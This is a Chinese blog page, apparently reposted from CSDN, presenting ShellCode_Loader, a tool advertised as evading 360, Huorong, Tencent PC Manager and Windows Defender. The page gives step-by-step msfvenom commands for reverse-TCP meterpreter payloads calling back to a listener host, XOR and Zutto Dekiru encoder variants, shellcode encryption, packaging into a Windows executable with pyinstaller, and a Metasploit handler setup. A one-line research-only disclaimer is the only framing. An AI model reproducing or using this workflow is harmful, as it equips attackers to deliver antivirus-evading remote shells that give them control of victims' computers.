码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具


    ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具

    文章目录

    • ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具
    • 一、声明
    • 二、测试环境
    • 三、生成Msf_Payload
    • 四、生成CobaltStrike_Payload
    • 五、加密Payload
    • 六、配置ShellCode加载器
    • 七、打包可执行程序(EXE编译环境)
    • 八、上线测试

    ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器、Shellcode_encryption - 免杀Shellcode加密生成工具,目前测试免杀360&火绒&电脑管家&Windows Defender(其他杀软未测试)。

    一、声明

    该项目仅供网络安全研究使用,禁止使用该项目进行违法操作,否则自行承担后果,请各位遵守《中华人民共和国网络安全法》!!!

    代码未经过大量测试,如发现问题请提交 issue。

    二、测试环境

    截至2022年9月3日测试时Windows 10 可免国内杀软:火绒&360&电脑管家及Windows Defender(其他杀软自测)

    Windows 7 64位 或以上操作系统应该都没问题(没有测试)

    三、生成Msf_Payload

    默认

    msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.33 lport=8899 -f c -o payload.c

    msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.33 lport=8899 -f py -o payload.c

    XOR 编码器

    msfvenom -e x64/xor -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.33 lport=8899 -f c -o payload.c

    动态密钥XOR编码器

    msfvenom -e x64/xor_dynamic -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.33 lport=8899 -f c -o payload.c

    Zutto Dekiru

    msfvenom -e x64/zutto_dekiru -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.33 lport=8899 -f c -o payload.c

    四、生成CobaltStrike_Payload

    在这里插入图片描述
    选择使用x64的C语言或Python语言的Shellcode。
    在这里插入图片描述
    得到:payload.c
    在这里插入图片描述

    五、加密Payload

    Shellcode_encryption.exe payload.c
    在这里插入图片描述

    六、配置ShellCode加载器

    将生成的密文ShellCode 填至 ShellCode_Loader.py 里的 Data = '密文Shellcode’处

    示例:
    在这里插入图片描述
    在这里插入图片描述

    七、打包可执行程序(EXE编译环境)

    Python 3.8.6

    pyinstaller 4.7

    pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple
    pyinstaller -F -w ShellCode_Loader.py

    生成ShellCode_Loader.exe在dist目录中。

    八、上线测试

    运行监听

    msfconsole
    msf6 > use exploit/multi/handler
    msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
    msf6 exploit(multi/handler) > set lhost 0.0.0.0
    msf6 exploit(multi/handler) > set lport 8080
    msf6 exploit(multi/handler) > run

    在这里插入图片描述
    在这里插入图片描述
    项目地址:
    https://github.com/Axx8/ShellCode_Loader

  • 相关阅读:
    Java基础入门day62
    JavaScript栈的实现与解题
    Linux系统自动化安装
    leetcode416分割等和子集刷题打卡
    java图片生成
    简单宠物网页设计作业 静态HTML动物介绍网页作业 DW宠物网站模板下载 大学生简单野生动物网页作品代码
    详解 Java 17 中新推出的密封类
    架构师总结了22条API设计的最佳实践
    python常见漏洞总结
    bayesplot|分享一个可视化贝叶斯模型的R包
  • 原文地址:https://blog.csdn.net/lza20001103/article/details/126674254
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号